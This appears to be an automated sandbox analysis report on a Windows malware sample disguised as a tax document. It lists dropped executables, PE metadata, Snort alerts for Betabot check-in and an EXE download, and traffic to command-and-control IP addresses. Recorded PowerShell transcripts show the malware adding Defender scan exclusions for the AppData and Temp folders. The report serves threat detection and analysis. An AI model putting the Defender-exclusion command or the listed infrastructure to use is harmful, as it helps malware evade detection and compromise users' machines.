                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview: 1
                                        C:\Users\user\AppData\Local\Temp\agq5ooig7au.exe
                                        Process:C:\Windows\SysWOW64\explorer.exe
                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):680448
                                        Entropy (8bit):7.109386979695027
                                        Encrypted:false
                                        SSDEEP:12288:yjw3mhs2SwibEO3GplmjwyFFubW87S3/C/OeEzoWJHVazmcDV:yjw3mYwibEO3GplmjwyFFubx7P/cLPah
                                        MD5:50803BDBA827E6AE4600DA26B5E81800
                                        SHA1:E3650665DD57B79514D33FE8E8D8FF8429B52C55
                                        SHA-256:02DCE269070BFEC91E4F01A67D774167F8208F17211E8027D8A7FE3DC62A356B
                                        SHA-512:C641B6937D93B76E592F69B35D8E0F8236C985A56BAE41B78FCA29A1B6F16F2C75FB25941D6957A1E761A64D66ACBDF9673CF13434D3CC6F7901904105E19C50
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 47%
                                        Joe Sandbox View:
                                        • Filename: OnZH4ftMLU.exe, Detection: malicious, Browse
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....XH`..............0..X...........v... ........@.. ....................................@.................................tv..W....................................u............................................... ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............`..............@..B.................v......H...........................p............................................(....*..{....*"..}....*J..(........(.....*..0.............s.....+..*..{....*"..}....*6.....(......*.0..L.......s........}.......(.......,..{.......+...., ...o...........s....(...+(......*.0.............s.....+..*....0...............s.....+..*..0............o.....o......s.....+..*".(.....*n.o....-...{....o.......+..*..{....*"..}....*..{ ...*"..} ...*..{!...*"..}!...*..{"...*"..}"...*..{#...*"..}#...*2....
                                        C:\Users\user\AppData\Local\Temp\iom7q73oi.exe
                                        Process:C:\Windows\SysWOW64\explorer.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):45056
                                        Entropy (8bit):4.490313118475907
                                        Encrypted:false
                                        SSDEEP:384:3GoUMQDhfWbKwaDwGYSk+RAno78NvcWceLMsT98or1GcB91EITQB4XWW0egcbAcQ:3khVwggo78NcWc8MsT9d1GcfhMJWzBG
                                        MD5:08CDFD0D3A406601C42F087DA16EC6C8
                                        SHA1:48FD8EEF568D2372E2A883283E58E5DEF81FEF07
                                        SHA-256:EB7CEA525ECEF555356C13B6948C21DDAD4B8A622FF4C027F285C0C096570253
                                        SHA-512:D522FC9C5815C93A1DC114C63DB53879346E435397CAD79A105A412CB18459335A1BFC3CFC9E7F6469CD703E2014538AA3C649442B80214A945E76ED50D26940
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 21%
                                        Joe Sandbox View:
                                        • Filename: OnZH4ftMLU.exe, Detection: malicious, Browse
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K..*...*...*...6...*...5...*..t5...*..Rich.*..................PE..L.....G`..................... ....................@.................................L...........................................(...........................................................................0... ....................................text....w.......................... ..`.data...............................@....rsrc...............................@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\89dad5d484a9f889a3a8dfca823edc3e_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                        Process:C:\Windows\SysWOW64\explorer.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):47
                                        Entropy (8bit):1.168829563685559
                                        Encrypted:false
                                        SSDEEP:3:/lSll2DQi:AoMi
                                        MD5:DAB633BEBCCE13575989DCFA4E2203D6
                                        SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                                        SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                                        SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                                        Malicious:false
                                        Preview: ........................................user.
                                        C:\Users\user\Documents\20210310\PowerShell_transcript.226533.Y48a1ZGl.20210310114233.txt
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):5694
                                        Entropy (8bit):5.382101394781873
                                        Encrypted:false
                                        SSDEEP:96:BZa//N3qDo1ZyZE//N3qDo1ZfRHZjZS//N3qDo1ZUAJJuZZ:G
                                        MD5:D15CC852AC45668872AB79A544C998CB
                                        SHA1:FB588FE3D6DCA4730F3F6044F019871BE7754080
                                        SHA-256:558350FA83016D5F06947E928ACB9363A3412D84E8E8951963B299F7A8945608
                                        SHA-512:863DBBDC30B91A6BA58A12D1A6F1E2018137DD1E4ED9CC09BD277A3E7E2CA159BE227146C5A6FDCE02C212A87C4A986504DDC093E600F266C9AD43E144283152
                                        Malicious:false
                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210310114234..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 226533 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'..Process ID: 5840..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210310114234..**********************..PS>Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'..**********************..Windows PowerShell transcript start..Start time: 20210310114711..Username: computer\user..RunAs User: computer\user..Configuration
                                        C:\Users\user\Documents\20210310\PowerShell_transcript.226533.gDmd_gCW.20210310114233.txt
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):5742
                                        Entropy (8bit):5.38270272736976
                                        Encrypted:false
                                        SSDEEP:96:BZa//NbqDo1ZOZA//NbqDo1Z27ljjZ5//NbqDo1Z0WzzGZR:s
                                        MD5:E45D0C57145CE350F37E6F9A7793EEE7
                                        SHA1:0629D1060B01922BA18A669645CF02A3BD9E7520
                                        SHA-256:6C44AF999AB007997FC95A830FCE7E5FC25158E35E1D3680D33C8DD372FA9B28
                                        SHA-512:908CD5C99CD584ECC2B69447E5F6FE2DAB155635D8284C5A9B67A1CF2A7BB1052A61FF63653994FD3888C1D96FCFA4F3EAB7E4B9E2F41DF9EC89F8F6B3BB92C7
                                        Malicious:false
                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210310114234..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 226533 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'..Process ID: 4540..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210310114234..**********************..PS>Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'..**********************..Windows PowerShell transcript start..Start time: 20210310114733..Username: computer\user..RunAs User: computer\user..Configur

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):5.888594490665969
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:Documento--SII--33875.exe
                                        File size:852996
                                        MD5:2ced2c14eece71c72c5e45e8a607bb4c
                                        SHA1:13a700a297a7e5697d69bb743c3b256ac10a14e2
                                        SHA256:4efd9a3fa2d25d6706213feb3299dd0f73777aad01217b9e3df046064fdbbb7e
                                        SHA512:199cb38d7f20f64b30d2cb2ba56dab6c0d3b2685d85a990c085060752071b9620d131c5c25bba9b3140c9816ae3515d6b7dbf794d3dd71db15bb8d3f4eb04f06
                                        SSDEEP:24576:vjmBlOdjWsqxOCNsYa/xHXhOCXlt4DOShLQK:n4yWZ
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........]............................r.......................................Rich............................PE..L....BC`...........

                                        File Icon

                                        Icon Hash:74ccc4d0dcdcd0d0

                                        Static PE Info

                                        General

                                        Entrypoint:0x429843
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                        DLL Characteristics:
                                        Time Stamp:0x60434210 [Sat Mar 6 08:49:20 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:04d2817c9af4caf688e2f1cd10fe3c90
                                        Instruction
                                        jmp 00007EFEF8B64B1Dh
                                        jmp 00007EFEF8B7A228h
                                        jmp 00007EFEF8B8BBB3h
                                        jmp 00007EFEF8B824AEh
                                        jmp 00007EFEF8B8BBE9h
                                        jmp 00007EFEF8B73544h
                                        jmp 00007EFEF8B6B67Fh
                                        jmp 00007EFEF8B7C18Ah
                                        jmp 00007EFEF8B8BB45h
                                        jmp 00007EFEF8B73390h
                                        jmp 00007EFEF8B68D3Bh
                                        jmp 00007EFEF8B80456h
                                        jmp 00007EFEF8B8EBE3h
                                        jmp 00007EFEF8B70D5Ch
                                        jmp 00007EFEF8B8EA77h
                                        jmp 00007EFEF8B68832h
                                        jmp 00007EFEF8B8DBCDh
                                        jmp 00007EFEF8B84468h
                                        jmp 00007EFEF8B628E3h
                                        jmp 00007EFEF8B8EA7Ch
                                        jmp 00007EFEF8B845D9h
                                        jmp 00007EFEF8B79564h
                                        jmp 00007EFEF8B8489Fh
                                        jmp 00007EFEF8B7066Ah
                                        jmp 00007EFEF8B848B5h
                                        jmp 00007EFEF8B70780h
                                        jmp 00007EFEF8B8CB4Bh
                                        jmp 00007EFEF8B893F6h
                                        jmp 00007EFEF8B6B0C1h
                                        jmp 00007EFEF8B70FACh
                                        jmp 00007EFEF8B69647h
                                        jmp 00007EFEF8B8C3F2h
                                        jmp 00007EFEF8B79616h
                                        jmp 00007EFEF8B72288h
                                        jmp 00007EFEF8B81883h
                                        jmp 00007EFEF8B7AE9Eh
                                        jmp 00007EFEF8B8C7E9h
                                        jmp 00007EFEF8B8B724h
                                        jmp 00007EFEF8B8EA83h
                                        jmp 00007EFEF8B7331Ah
                                        Programming Language:
                                        • [RES] VS2003 (.NET) build 3077
                                        • [ASM] VS2003 (.NET) build 3077
                                        • [C++] VS2003 (.NET) build 3077
                                        • [ C ] VS2003 (.NET) build 3077
                                        • [LNK] VS2003 (.NET) build 3077
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9f0000x28.idata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xa00000x7ac.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x7a0000x1c.rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x9f1f80x1d0.idata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .rdaals20x10000x270f20x28000False0.00110473632813data0.0IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .text0x290000x506ed0x51000False0.295253423997data5.61178432466IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rdata0x7a0000x133340x14000False0.318933105469data4.38860465932IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0x8e0000x109bc0x3000False0.149332682292data1.50156337755IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .idata0x9f0000xbc90x1000False0.269775390625data3.80824348363IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .rsrc0xa00000x7ac0x1000False0.2138671875data2.10865995397IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0xa00e80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 2291108088, next used block 63371
                                        RT_GROUP_ICON0xa03d00x14data
                                        RT_VERSION0xa03e40x3c8dataEnglishUnited States
                                        DLLImport
                                        KERNEL32.dllGetLocalTime, HeapAlloc, GetProcessHeap, GetProcAddress, LoadLibraryW, GetModuleHandleA, GetStartupInfoW, GetVersionExA, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, FatalAppExitA, HeapFree, RtlUnwind, IsBadWritePtr, IsBadReadPtr, HeapValidate, GetTimeFormatA, GetDateFormatA, GetCPInfo, TlsAlloc, GetCurrentThreadId, TlsFree, TlsSetValue, TlsGetValue, SetLastError, GetLastError, GetCurrentThread, ExitProcess, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, IsValidLocale, IsValidCodePage, GetLocaleInfoA, EnumSystemLocalesA, GetUserDefaultLCID, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, GetModuleFileNameW, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetCommandLineW, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, HeapDestroy, HeapCreate, VirtualFree, GetModuleFileNameA, WriteFile, InitializeCriticalSection, VirtualAlloc, HeapReAlloc, VirtualQuery, InterlockedExchange, DebugBreak, InterlockedDecrement, OutputDebugStringA, LoadLibraryA, InterlockedIncrement, WideCharToMultiByte, GetTimeZoneInformation, VirtualProtect, GetSystemInfo, GetACP, GetOEMCP, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetConsoleCtrlHandler, GetLocaleInfoW, LCMapStringA, LCMapStringW, RaiseException, SetFilePointer, SetStdHandle, CompareStringA, CompareStringW, SetEnvironmentVariableA, FlushFileBuffers, CloseHandle
                                        DescriptionData
                                        LegalCopyrightVDOni Helpa Kuo Siatempe
                                        InternalNameAhma Ob5ml Esk Eml
                                        FileVersion58.9.948
                                        CompanyNameFDUs Ikrso Stop Bga
                                        LegalTrademarksSDo. Tiu. Eksa Ho.
                                        CommentsSygBefgi Erko Bo Ve,
                                        ProductNameZSubjekto TErade Hdo Ogs
                                        ProductVersion58.9.948
                                        FileDescriptionEDLarinrgalo. Mern Kune Demandovorto,
                                        OriginalFilenameMs5io.exe
                                        Translation0x0409 0x04b0

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        03/10/21-11:42:24.226293ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.58.8.8.8
                                        03/10/21-11:42:27.643245TCP2018784ET TROJAN Win32/Neurevt.A/Betabot Check-in 44971580192.168.2.5212.114.52.43
                                        03/10/21-11:42:29.589484TCP2021697ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious4971680192.168.2.5104.21.55.228

                                        Network Port Distribution

                                        • Total Packets: 106
                                        • 443 (HTTPS)
                                        • 80 (HTTP)
                                        • 53 (DNS)
                                        TimestampSource PortDest PortSource IPDest IP
                                        Mar 10, 2021 11:42:27.599033117 CET4971580192.168.2.5212.114.52.43
                                        Mar 10, 2021 11:42:27.636920929 CET8049715212.114.52.43192.168.2.5
                                        Mar 10, 2021 11:42:27.637079000 CET4971580192.168.2.5212.114.52.43
                                        Mar 10, 2021 11:42:27.643244982 CET4971580192.168.2.5212.114.52.43
                                        Mar 10, 2021 11:42:27.643287897 CET4971580192.168.2.5212.114.52.43
                                        Mar 10, 2021 11:42:27.681111097 CET8049715212.114.52.43192.168.2.5
                                        Mar 10, 2021 11:42:27.681140900 CET8049715212.114.52.43192.168.2.5
                                        Mar 10, 2021 11:42:27.732872963 CET8049715212.114.52.43192.168.2.5
                                        Mar 10, 2021 11:42:27.733014107 CET4971580192.168.2.5212.114.52.43
                                        Mar 10, 2021 11:42:29.550841093 CET4971680192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:29.588946104 CET8049716104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:29.589056015 CET4971680192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:29.589483976 CET4971680192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:29.627363920 CET8049716104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:29.635297060 CET8049716104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:29.635428905 CET4971680192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:29.643107891 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:29.681638002 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:29.681755066 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:29.703493118 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:29.741869926 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:29.744219065 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:29.744301081 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:29.744301081 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:29.744359970 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:29.806951046 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:29.818589926 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:29.845343113 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:29.845374107 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:29.845529079 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:29.856807947 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.566404104 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.566432953 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.566448927 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.566461086 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.566471100 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.566489935 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.566498041 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.566504002 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.566541910 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.566566944 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.566793919 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.566816092 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.566890001 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.567709923 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.567734957 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.567826033 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.568599939 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.568619967 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.568696022 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.569503069 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.569525003 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.569602013 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.569761038 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.570408106 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.570425987 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.570545912 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.721568108 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.721596003 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.721640110 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.721721888 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.721757889 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.721785069 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.722125053 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.722147942 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.722184896 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.722219944 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.723028898 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.723053932 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.723113060 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.723145008 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.724000931 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.724025965 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.724082947 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.724096060 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.724798918 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.724826097 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.724881887 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.725709915 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.725748062 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.725790024 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.725816011 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.726636887 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.726674080 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.726705074 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.726735115 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.727546930 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.727571011 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.727627993 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.728420019 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.728445053 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.728601933 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.729341984 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.729363918 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.729402065 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.729429007 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:30.730238914 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.730263948 CET44349717104.21.55.228192.168.2.5
                                        Mar 10, 2021 11:42:30.730325937 CET49717443192.168.2.5104.21.55.228
                                        Mar 10, 2021 11:42:33.636997938 CET4971580192.168.2.5212.114.52.43
                                        TimestampSource PortDest PortSource IPDest IP
                                        Mar 10, 2021 11:41:45.457556963 CET53620608.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:13.010899067 CET6180553192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:13.066914082 CET53618058.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:20.882999897 CET5479553192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:20.931772947 CET53547958.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:21.955091000 CET4955753192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:22.003865004 CET53495578.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:22.839747906 CET6173353192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:22.919651985 CET53617338.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:23.145108938 CET6544753192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:24.146101952 CET6544753192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:24.200372934 CET53654478.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:24.226169109 CET53654478.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:27.533092976 CET5244153192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:27.590620995 CET53524418.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:29.447962046 CET6217653192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:29.486794949 CET5959653192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:29.503112078 CET53621768.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:29.548923969 CET53595968.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:33.592852116 CET6529653192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:33.909949064 CET6318353192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:33.925044060 CET53652968.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:33.970722914 CET53631838.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:36.868185997 CET6015153192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:36.922789097 CET53601518.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:38.574233055 CET5696953192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:38.620115995 CET53569698.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:39.704246998 CET5516153192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:39.761579037 CET53551618.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:41.292442083 CET5475753192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:41.341227055 CET53547578.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:42.223999023 CET4999253192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:42.277993917 CET53499928.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:42.530456066 CET6007553192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:42.584700108 CET53600758.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:45.911041975 CET5501653192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:45.965420008 CET53550168.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:48.440924883 CET6434553192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:48.489754915 CET53643458.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:48.731410980 CET5712853192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:48.790709972 CET53571288.8.8.8192.168.2.5
                                        Mar 10, 2021 11:42:51.556493998 CET5479153192.168.2.58.8.8.8
                                        Mar 10, 2021 11:42:51.610935926 CET53547918.8.8.8192.168.2.5
